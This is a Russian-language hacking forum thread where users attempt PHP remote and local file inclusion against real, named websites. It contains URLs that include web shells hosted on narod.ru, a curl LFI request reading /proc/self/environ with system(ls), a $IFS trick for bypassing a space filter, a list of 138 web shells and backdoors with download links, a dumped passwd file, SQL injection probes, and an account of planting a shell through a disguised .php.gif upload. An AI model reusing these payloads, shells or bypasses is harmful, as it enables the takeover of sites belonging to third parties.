А у меня когда я ствлю линк на сайт

то выдаёт Warning: include(inchttp://.......narod.ru/r57shell.php.inc) [function.include]: failed to open stream: No such file or directory in /home/users/082e0ba14ede192cde00d9a3b4e644e2/index.php on line 56

Warning: include() [function.include]: Failed opening 'inchttp://.....narod.ru/r57shell.php.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/users/082e0ba14ede192cde00d9a3b4e644e2/index.php on line 56

можете подска3ать 4то я делаю не так. 3а рание спасибо

у меня тоже самое

А можно выложить несколько сайтов с такой уязвимостью, просто для проверки своего шелл? а то обшарил уже кучу сайтов и чёт не у кого не выходит ошибки в сценарии

Какая то не понятная херь... может сам шел не работает!! Как его проверить можно? я уже даже пробовал это проделать на том сайте на котором ты показывал пример в своём видео. Тоха, залей сюда свой рабочий шелл или дай линк на тот что у тебя установлен. плз

code:

1.Аccept Language
2.Ajan.asp
3.Ajax PHP Command Shell
4.Antichat Shell v1.3
5.Asmodeus v0.1.pl
6.Ayyildiz Tim -AYT- Shell v 2.1 Biz
7.aZRaiLPhp v1.0
8.backdoor1
9.backdoorfr
10.backup.php
11.backupsql
12.backupsql.php
13.Blind Shell.cpp
14.c99
15.c99(1).php
16.c100
17.c2007.php
18.Casus15.php
19.cgi-python.py
20.CMD.asp
21.CmdAsp.asp
22.connectback2.pl
23.Crystal
24.ctt_sh
25.ctt_sh.php
26.cybershell
27.cybershell.php
28.CyberSpy5.Asp
29.dC3 Security Crew Shell PRiV
30.Dive Shell 1.0 - Emperor Hacking Team
31.DTool Pro
32.Dx
33.DxShell_hk.php
34.Dx.php
35.EFSO_2.asp
36.Elmali Seker.asp
37.elmaliseker.asp
38.Fatalshell.php
39.fuckphpshell
40.GFS web-shell ver 3.1.7 - PRiV8
41.gfs_sh
42.gfs_sh.php
43.h4ntu shell [powered by tsoi]
44.img.php
45.iMHaPFtp
46.iMHaPFtp.php
47.Inderxer.asp
48.indexer.asp
49.ironshell
50.Java Shell.js
51.JspWebshell 1.2
52.KAdot Universal Shell v0.1.6.html
53.Klasvayv.asp
54.lamashell
55.Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit
56.load_shell
57.load_shell.php
58.lurm_safemod_on.cgi
59.mailer3.php
60.matamu
61.Moroccan Spamers Ma-EditioN By GhOsT
62.myshell.php
63.Mysql interface v1.0
64.MySQL Web Interface Version 0.8
65.mysql.php
66.mysql_shell
67.mysql_tool.php
68.NCC-Shell
69.network.php
70.NetworkFileManagerPHP
71.NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version
72.Nshell (1).php
73.nshell.php
74.nstview.php
75.NT Addy.asp
76.ntdaddy.asp
77.perlbot.pl
78.PH Vayv.php
79.PHANTASMA
80.PHP Backdoor Connect.pl
81.PHP Shell.php
82.phpbackdoor15
83.php-backdoor
84.php-include-w-shell
85.pHpINJ.php
86.phpjackal
87.phpshell17
88.PHPRemoteView
89.Phyton Shell.py
90.phvayv.php
91.Private-i3lue
92.pws
93.pws.php
94.ru24_post_sh
95.r57 Shell.php
96.r57.php
97.r577.php
98.Rader.asp
99.Rem Exp.asp
100.Rem View.php
101.rootshell
102.ru24_post_sh.php
103.Russian.php
104.s72 Shell v1.1 Coding
105.s.php
106.Safe0ver Shell -Safe Mod Bypass By Evilc0der
107.Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
108.Server Variables.asp
109.shell.php
110.shellbot.pl
111.SimAttacker - Vrsion 1.0.0 - priv8 4 My friend
112.simple_cmd
113.simple-backdoor
114.SimShell 1.0 - Simorgh Security MGZ
115.Sincap.php
116.smtpd.py
117.SnIpEr_SA Shell
118.spy.php
119.sql.php
120.telnet.cgi
121.telnet.pl
122.telnetd.pl
123.Test.php
124.Tool.asp
125.Uploader.php
126.w3d.php
127.w4k.php
128.w.php
129.wacking.php
130.webshell
131.WebShell.cgi
132.WinX Shell
133.Worse Linux Shell
134.xinfo.php
135.zacosmall
136.zacosmall.php
137.zehir4.asp
138.Zehir 4.asp

rapidshare (https://hpc.name/redirector.html#http://rapidshare.com/files/106566549/138Shells.zip)
dump (https://hpc.name/redirector.html#http://dump.ru/file/3104054)

перезалил на dump (https://hpc.name/redirector.html#http://dump.ru/file/3104054)

Цитата:


Warning: include(sdf) [function.include]: failed to open stream: No such file or directory in /www/UE/index.php on line 77

Warning: include() [function.include]: Failed opening 'sdf' for inclusion (include_path='.:') in /www/UE/index.php on line 77



vot u men9 ne polu4aetsya zalil Shell na narod.ru (( ne polu4ikos 4to delat ???

Toxa тебе респект))) шеллы не скачиваются

нашел сайты с багами но не шелл не локальный инклюуд не действует, поможет кто с сайтами ?

Перезалейте шеллы не качаются они ошибка в конце скачивания(((

t0xA, у тя нормально с народа файлы инклудятся? А там чмод побольше даже нельзя поставить(((

Хост имеется! Очень даже хороший! php+mysql держит! С рекламой, но я на неё забил. Любые скрипты лежат(шеллы,админка ддос бота и т.п.), пока меня не банят))) но при попытки проинклудить редиректят на какую-то фигню))) А на народе регнулся там, пока ничё не инклудится((( Не подскажешь какой-нибудь бажный скрипт, хочу на локалхосте потестить....

Восемь часов за компом, устал, неправильно прочитал.... сорри

Скрытый текст (вы должны быть авторизованы и иметь 30 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

вот именно!!!

Можно получить пароль от админки при помощи неё?

когда Toxa вводил команды там выдавались коды ток я там ничего не понял.Их надо расшифрововать?

Добавлено через 7 минут
Notice: Undefined index: p in F:\bernslandscape\main.php on line 247

Warning: main() [function.include]: Failed opening '' for inclusion (include_path='.;c:\php\includes') in F:\bernslandscape\main.php on line 247
эта ошибка означает что сайт уязвим?

Добавлено через 11 минут
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
как можно из этого кода получить пароль?

Блин да что ж за хрень то такая, скоко сайтов перебрал и нигде ничего не получается!!!
Может я туплю в чем то, в основном выдает ероры, дайте сайт где 100% работает проверить хоть.

Цитата:

Сообщение от t0xA

Вот все шеллы
Чтоб неговорили что злой хакер t0xA хочет заразить страшным вирусом, предупреждаю антивир будет ругатся

залей плс на дамп.с форума не скачивается >.<

подскажите плиз вот имея такую ошибку на dle, при попытке залить шел выдает вот это Hacking attempt!
а вот и сама ошибка

Цитата:


Warning: include_once(/var/www/a10214/data/www/samouchka.net/templates/..//login.tpl): failed to open stream: No such file or directory in /var/www/a10214/data/www/samouchka.net/engine/init.php on line 340 Warning: include_once(): Failed opening '/var/www/a10214/data/www/samouchka.net/templates/..//login.tpl' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/a10214/data/www/samouchka.net/engine/init.php on line 340 Невозможно загрузить шаблон: shortstory.tpl



можно как нить пробраться до админки

а какие есть способы обхода?

народ можно взломать ник на сайте wab.ru таки же способом?если да то плизз объясните более подробно что и как,и если возможно снимите видео

видео снято качай (http://hpc.name/downloads.php?do=file&id=2612)
p.s. за видео спасибо tOx'е

Народ подскажите че не так делаю

Вот код:

code:

http://www.fihgu.com/index.php?pagina=http://le.....v.narod.ru/c99shell.php

Вот скрин че не так делаю???



================================================== ==========
==========все нервы вымотал:blow::blow::blow:===============
================================================== ==========

Добавлено через 5 часов 27 минут
Эй народ че не кто не поможет????

видео понятное попробывал не получилось у меня(

такая ошибка есть, как можно взломать?
[HIDE-REPLY]25/?field=489412
25/?field=489412'
Query: select * from markt_links where id=489412\'
Error #1064 occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1.[/HIDE-REPLY]

есть ли какойнить php двиок абсалютно без ошибочный?

а мне не ответите на вопрос?(

У меня вид адреса такой:"http://site.ru/engine/config/conf_mysql.php"

И выходит ошибка:"Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'newworl'@'localhost' (using password: NO) in /home/newworl/public_html/engine/config/conf_mysql.php on line 14 No Connect"

Как мне PHP - иньекцию произвести?

неподходит

Народ у мя такая вот проблема.
Ест сайт: допустим www.domain.ru (https://hpc.name/redirector.html#http://www.domain.ru).

Есть адресс "http://www.subdomain.domain.ru/index.php?current=2".
Когда я пишу так "http://www.subdomain.domain.ru/index.php?current=2'", мне выдает вот такую ошибку:
-----
Warning: include(html/.php) [function.include]: failed to open stream: No such file or directory in /home/domain/public_html/subdomain/index.php on line 79

Warning: include(html/.php) [function.include]: failed to open stream: No such file or directory in /home/domain/public_html/subdomain/index.php on line 79

Warning: include() [function.include]: Failed opening 'html/.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/domain/public_html/subdomain/index.php on line 79
-----

Ни шелл, ни локальный инклудинг не работаю... Чтобы я не делал, мне выдает ту же самую страницу с теми же самыми ошибками. Помогите... уж очень надо!

люди, когда я пытаюсь зайти на сайт через шелл, мне показывает шелл на хостинге где я его поместил. как сделать чтобы он ни мой хост открывал, а уязвимый сайт? может на хосте отключить пхп? или как еще можно?

парни вот я коечто получил из сайта скажите что из этого можно извлечь? файл прикреплен

Люди а мне никто не поможет????:em14:

Привет, всем я тут новичек. Вот я пишу сам сайты на PHP.
Движки не очень люблю юзать. Всегда пишу сам. и только вчера написал движок с использованием инклюд для облегчения работы, и нашел на этом сайте почти полную копию моего уязвимого инклюда =) Помогите как избежать этого.

code:

подскажите пожалуйста какой-нибудь хостинг чтоб shell залить(кроме народа а то он чё то не пашет)

В инклуде далеко не лучшее место для динамически подставляемых переменных.

t0xA, у меня имееться ссылка вида http://site.com/test.php (https://hpc.name/redirector.html#http://site.com/test.php) и при переходе на неё выходит ошибка: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/baza/data/www/site.com/test.php on line 5 . Я знаю много сайтов с подобными ошибками и но как иньекцию произвести незнаю подскажи что делать. И ещё вопрос для чего раскрытие пути нужно?

юзаю lfi, выполняю запрос -

Цитата:


curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=system(ls);" -h "user-agent: " > info.html



всё работает на ура! выполняю запрос -

Цитата:


curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=system(ls -la);" -h "user-agent: " > info.html



не проходит..... скорей всего дело в пробеле...как это обойти? кто поможет, плюс в репу обеспечен!

Скрипт фильтрует пробел.... Попробуй замени символ пробела на $IFS

http://catenabrasil.com/portal/index...99madshell.php (https://hpc.name/redirector.html#http://catenabrasil.com/portal/index.php?arq=http://brandono.narod.ru/c99madshell.php)
В чём ошибка подскажите пожалуйста

:glass: всмысле, ошибка?

ну я перехожу по сылке а там вообще ничего нет....тупо белый экран...Что я не так делаю?

Добавлено через 9 часов 32 минуты
ну что конибудь знает почему не получаеться?

Гуглом я наишел более похожый сайт под описание, захожу по:

http://bombus-im.org/index.php?page=download (https://hpc.name/redirector.html#http://bombus-im.org/index.php?page=download)

В конце вместо "download" пишу чего душа пожелает, допустим "fiowefg" и вместо того что бы написать ошибку, сайт меня отсылает не понятно куда.

Что это означает?

И что делать если в конце сайта что то типу: php?id=7895

(как сдесь http://yandeg.ru/stat.php?id=97639 (https://hpc.name/redirector.html#http://yandeg.ru/stat.php?id=97639) )

Упс, как то не заметил вот эту строчку:

Цитата:


PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.



А как добратся до index.php что бы проверить строчки:

Цитата:






Бо я так понял что применить инъекцию можно только если в .php есть эти две строчки...

Цитата:

Сообщение от Mater

Скрипт фильтрует пробел.... Попробуй замени символ пробела на $IFS

Объясните, пожалуйста, что такое $IFS. Искал в гугле и в своих книжках по PHP, ничего не нашёл.

Цитата:

Сообщение от gustov

//

o:
Не совсем понял. Это мне? Если да, то нельзя подробней объяснить, что такое $IFS? Я смотрел в учебниках раздел о комментариях, там ни о чём подобном не написано.:confused:

Народ если шелл удачно залит куда должно перекинуть?На сам шелл?

Frinst, да, только должно не просто перекинуть по адресу шелла, а он сам должен запуститься с уязвимого сайта.

Сто пудово что-то не так, но, увы, экстрасенсорными способностями не обладаем... давай ссылку, где так пишет, так может кто и поможет разобраться, что не так))

у мну вообще пишет " данная страница не найдена, перейдите на стартовую страницу" может я че не так сделал?

вообщем вот тема:
есть адресс на админку сайта. каким способом можно зайти в админку? вот ссылка для обзора http://kolvi.com/administrator/ (https://hpc.name/redirector.html#http://kolvi.com/administrator/)

Капитан Очевидность тут мне шепнул, что надо логин и пароль ввести
А адмирал Ясен ][** говорит, надо сайт этот взломать сначала... oO

Зы какое отношение это имеет к теме инклуда? Никакого! Тогда какой в этом смысл? Вот именно, в этом нет никакого смысла! (с)

ЗЗЫ знаешь сколько таких админок можно найти за 0,32 секунды? Не знаешь? 52 500 000 штук!!! ->ННХ (https://hpc.name/redirector.html#http://www.google.ru/search?hl=ru&newwindow=1&client=firefox&hs=AyS&rls=org.mozilla%3Aru%3Aofficial&q=inurl%3A%2Fadmin&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&aq=f&aqi=&aql=&oq=&gs_rfai=)

Добавлено через многа времени xD
Я это если чё к тому, что твой вопрос не имел отношения к данной уязвимости, был задан не в тему и совершенно не конкретен, ибо это вопрос из разряда "Как вломать сайт?"

Цитата:

Сообщение от M@ZAX@KEP

Капитан Очевидность тут мне шепнул, что надо логин и пароль ввести
А адмирал Ясен ][** говорит, надо сайт этот взломать сначала... oO

Зы какое отношение это имеет к теме инклуда? Никакого! Тогда какой в этом смысл? Вот именно, в этом нет никакого смысла! (с)

ЗЗЫ знаешь сколько таких админок можно найти за 0,32 секунды? Не знаешь? 52 500 000 штук!!! ->ННХ (https://hpc.name/redirector.html#http://www.google.ru/search?hl=ru&newwindow=1&client=firefox&hs=AyS&rls=org.mozilla%3Aru%3Aofficial&q=inurl%3A%2Fadmin&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&aq=f&aqi=&aql=&oq=&gs_rfai=)

да ладно... правда? а я то идиот не догадался, что надо логин и пароль ввести.... )))))))))
всеравно спасибо

я залил шел...как его открть?я пописываю к нему строку а он начинает скачиватся....помогите плиз...и если не трудно пишите в лычку

Цитата:

Сообщение от Crazy_Dope

вообщем вот тема:
есть адресс на админку сайта. каким способом можно зайти в админку? вот ссылка для обзора http://kolvi.com/administrator/ (https://hpc.name/redirector.html#http://kolvi.com/administrator/)

Нужно просто тебе узнать логин и пасс от админки и тогда зайдёшь:-)
P.S. Прежде чем задать вопрос,сначала подумай,что ты хочешь написать!

Цитата:


Вот все шеллы
Чтоб неговорили что злой хакер t0xA хочет заразить страшным вирусом, предупреждаю антивир будет ругатся



У меня 10 каспер и он мне не просто ругается он мне запрещает распоковывать архив. Примерно так: операция прервана поскольку в архиве находится вредоносный файлЯ этот архив даже в исключения добавлял всё ровно!

вот что есть на http://volkswagen.msk.ru/ (https://hpc.name/redirector.html#http://volkswagen.msk.ru/)

code:

Warning: main() [function.include]: Failed opening '' for inclusion (include_path='.:') in /home/volkswagen.msk.ru/public_html/index.php on line 317

Но я что-то постремался делать, что либо ))

Добавлено через 1 минуту
tool 23, выруби каспера на время, сделай то что тебе надо,а потом снова включи ))

tool 23 на любой скрипт, софтину и т созданый "хакерами" антивирь будет ругатся! ну канешно если эта софтина уже гдето в паблике сверкала)... так что думай сам! и в том архиве нет 100% подставы

Народ добрый день!
Я как бы только начинающий ...
Подскажите значит так есть форум IP board я через аватар залил jpg с кодом shlla (remview_2003_10_23) при обращение к аватарке ни чего не происходит но код в картинке есть (скачиваю картинку с сайта открываю notepad++ код есть)что делать подскажите плиз всю ночь мучился ни че не получилось

интерпритаторы php не обрабатывают все файлы, запрашиваемые web-server_ом, а только файлы с назначенным расширением. Как правило только .php, так что не уливительно, что код в .jpg изображении не выполняется. Он просто выдаётся веб-сервером напрямую, а не интерпретируется пых-пыхом.

Вообще я считаю что стандартные инъекции (зачастую) можно применить только на сайтах которые не предоставляют ценности (из разряда взломал и написал ЗДЕСЬ БЫЛ ВАСЯ) так как нормальные сайт от этих инъекций давно защищены.
И на всех форумах одно и тоже.
Да и вообще 90% сайтов про взлом для обычного (типа меня пользователя) на самом деле не представляю ценности.
Заходишь столько новых слов и начинаешь побывать (а точнее время убивать)
А те кто шарят общаются своей группой и даже если знаю ответ молчат...
И основное общение происходит посмотри там google.ru или линки кидают
Ну как то так это мое ИМХО

доброго времени суток всем) а что значит ошибка
Warning: include() [function.include]: open_basedir restriction in effect. File(../../../etc/passwd) is not within the allowed path(s): (/customers/jlc-software.com/jlc-software.com:/var/www/diagnostics:/usr/share/php) in /customers/jlc-software.com/jlc-software.com/httpd.www/index.php on line 37
возникает когда пытаюсь etc/passwd проинклюдить....

Цитата:

Сообщение от user_max

доброго времени суток всем) а что значит ошибка
Warning: include() [function.include]: open_basedir restriction in effect. File(../../../etc/passwd) is not within the allowed path(s): (/customers/jlc-software.com/jlc-software.com:/var/www/diagnostics:/usr/share/php) in /customers/jlc-software.com/jlc-software.com/httpd.www/index.php on line 37
возникает когда пытаюсь etc/passwd проинклюдить....

Скрипт не пускает вне предопределенного адреса, поэтому проинклюдить passwd ты не сможешь

а есть какойто сканер или чтото такео чтоби искать ету уязвимость на сайте ..?

JSky должен находить.
Из моей личной практике Jsky находил SQL - injektion, XSS. Ну и другие...

bohdan21739, w3af находит всё и вся. :wink:

Цитата:

Сообщение от Dedicat_seller

Ты в сети бываеш когданить? Как с тобой связатся?

всё я в сети,просто только из Австралии прилетел!

киньте в личку JSky плз
скачивал, ошибку выдает при запуске

Цитата:

Сообщение от FrostArtes

киньте в личку JSky плз
скачивал, ошибку выдает при запуске

на держи!JSky (https://hpc.name/redirector.html#http://www.sendspace.com/file/u53155)

wolf295214, ты меня удивляешь! =) Питона второй ветки втыкай. Оно ему надо =)
А вообще-то на сайте у них это всё написано.

Цитата:

Сообщение от M@ZAX@KEP

bohdan21739, w3af находит всё и вся. :wink:

скачал этот w3af,но он не запускается.В чём проблемма?

Цитата:

Сообщение от wolf295214

скачал этот w3af,но он не запускается.В чём проблемма?

Ты в сети бываеш когданить? Как с тобой связатся?

Цитата:

Сообщение от rashin

как лутше на безопастность и на отаки проверить?

А это не одно и тоже :hmcool:

unit08, очевидно, скачать этот файл :ag:
Инклуда там нет.

а тут что можна сделать?
http://www.zwicky-stiftung.ch/index....u/c99shell.php (https://hpc.name/redirector.html#http://www.zwicky-stiftung.ch/index.php?p=35%7C39%7C39&url=http://d7r7a7g7.narod.ru/c99shell.php)

день добрый. проблема заключается в следующем...
через sqli получил доступ к админке на сайт. админка самописная.
в ней можно добавлять так называемые модули.
добавил новый модуль, но вместо локальных скриптов кинул ссылку на файл такого типа: site.com/shell.php.gif
После перехода на модуль, шелл выполнился на сайте с этой самой админкой, но беда в том, что нет прав на запись. Да и при клацании кнопок шелла, тоесть при передаче скрипту каких-либо параметров скрипт просто сбрасывается и отображается главная страница сайта.
что можете посоветовать в этом случае?
З.Ы. Цель поместить шелл все таки в папку сайта, а не инклудить постоянно
На всякий случай еще допишу, что запись в файл через мускул тоже не работает

=====================================

Проблему решил, найдя каталог с аватарами, куда можно было записывать файлы, после чего через заинклуденный скрипт без проблем загрузил его же на сервер.

Добавлено через 10 часов 47 минут
Снова нужна помощь, теперь уже с другим сайтом.
есть инклуд в параметре ?url, только беда в том, что файл 1.php.gif пытается отобразиться как картика, 1.php.txt соответственно как текст. Файлы html тоже отображаются текстом, за исключением тега заднего фона. Печальная ситуация, может кто подскажет как быть?

Такой вопрос по php иньекциям: обязательно ли грузить remview.php на на народ, или можно указать к ней путь прямо у себя на диске?

Например: www.****.in.ua/?cat=D:\remview.php (https://hpc.name/redirector.html#http://www.****.in.ua/?cat=D:\remview.php) - открылась главная страница сайта.

И еще вопрос: уязвим ли сайт www.****.org/index.php?id=19&tx_ttnews (https://hpc.name/redirector.html#http://www.****.org/index.php?id=19&tx_ttnews)[tt_news]=157&tx_ttnews[backPid]=1&cHash=a01ccef0ab ?

Когда пытаюсь загрузить на него шел с сайта http://kgb-hack.narod.ru/r57shell.php (https://hpc.name/redirector.html#http://kgb-hack.narod.ru/r57shell.php) то открывается главная страница, почему?

НЕзнаю туда или нет если что переместите!Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Добавлено через 5 минут
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

капец полный все что здесь написано полное фуфло и не работает ни на одном сайте в 2011 году хоть какой шел заливай все ровно пишет Warning: displaycontent(inc/content/http://deviler435.narod2.ru/uroki/shell/Tekstovyi_dokument.php) [function.displaycontent]: failed to open stream: No such file or directory in /web/omronural/site/www/inc/setup.php on line 132

Warning: displaycontent(inc/content/http://deviler435.narod2.ru/uroki/shell/Tekstovyi_dokument.php) [function.displaycontent]: failed to open stream: No such file or directory in /web/omronural/site/www/inc/setup.php on line 132

Warning: displaycontent() [function.include]: Failed opening 'inc/content/http://deviler435.narod2.ru/uroki/shell/Tekstovyi_dokument.php' for inclusion (include_path='.:/usr/local/lib/php/') in /web/omronural/site/www/inc/setup.php on line 132

Добавлено через 3 минуты
и вообще сколько здесь материала бы не было не что не работает

2 deviler435:
Try Harder. (https://hpc.name/redirector.html#http://www.offensive-security.com/when-things-get-tough.php)
Уязвимость более чем актуальная, а если лично ты её просто не нашёл или не раскрутил, как думаешь, в ком проблема?

похоже здесь не у одного меня такая проблема может тогда объяснишь почему не один сайт не взламывается этим методом

А кто тебе сказал что на каждом сайте должна быть эта уязвимость? Нашёл - радуйся, не нашёл - ничего удивительного.
На вот, тренируйся: тык (https://hpc.name/redirector.html#http://forum.antichat.ru/threadnav38443-1-10.html).
Как видишь, более чем дохрена сайтов имеют эту багу. Доставило?

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Подскажите хостинг который не поддерживает PHP .

Цитата:

Сообщение от M@ZAX@KEP

narod
ucoz

Narod переехал на Ucoz. А на Ucoz'e нельзя закачать на фтп файлы php

Цитата:

Сообщение от DnB

Narod переехал на Ucoz. А на Ucoz'e нельзя закачать на фтп файлы php

Инклудить можно и txt файлы)

Цитата:

Сообщение от DnB

Narod переехал на Ucoz. А на Ucoz'e нельзя закачать на фтп файлы php

ты уже весь форум на уши поставил в поисках хостинга без пхп!
Как сказал maxarr -инклудить можно и тхт!
Если принципиально хочешь проинклудить пхп, то можно даже на хостинге с php, настроить одну папку в которой shell.php сервер будет отдавать на закачку, а не выполнять его на самом сервере!!
Просто вникни и почитай как инклуды работают, и станет ясно что ты бессмысленно ищешь то, без чего можно(и даже нужно) обойтись !

Цитата:

Сообщение от rox@hak

ты уже весь форум на уши поставил в поисках хостинга без пхп!
Как сказал maxarr -инклудить можно и тхт!
Если принципиально хочешь проинклудить пхп, то можно даже на хостинге с php, настроить одну папку в которой shell.php сервер будет отдавать на закачку, а не выполнять его на самом сервере!!
Просто вникни и почитай как инклуды работают, и станет ясно что ты бессмысленно ищешь то, без чего можно(и даже нужно) обойтись !

Благодарен, а может еще сможете подсказать сайт на котором 100% работает уязвимость?

Цитата:

Сообщение от DnB

Благодарен, а может еще сможете подсказать сайт на котором 100% работает уязвимость?

Подсказать сайт тебе вряд ли смогут, если хочешь проверить на практике, точнее наглядно как оно делается, зарегай хостинг с поддержкой php, создай страницу с инклудом и подгружай через нее сторонний шелл!
На мой взгляд, данная уязвимость очень редкая, так как должна быть не только в движке сайта, но и иметь возможность проинклудиться! На большинстве хостингов включена возможность только локальных инклудов!

narod
ucoz

А как этим всем пользоваться?

Берешь и юзаешь, что тут не понятного то? Шире раскрывайте свои вопросы.

имеется сайт с открытой phpinfo вот (https://hpc.name/redirector.html#http://risalat.ru/test.php) что с ним можно делать? еще такой вопрос , с помощью активной xss что можно достать кроме кукисов.. спасибо

Цитата:

Сообщение от rauf1324

С помощью активной xss что можно достать кроме кукисов...

Ответ на твой вопрос
(https://hpc.name/showpost.php?p=426019&postcount=5)

всем привет. честно говоря не особо понял тему. вот я могу загрузить на один сайт файл типа foto.php.gif когда открываю открывается как картинка, а не как php, для этого мне надо сначала инклуд найти? или можно самому с помощью картинки сделать инклуд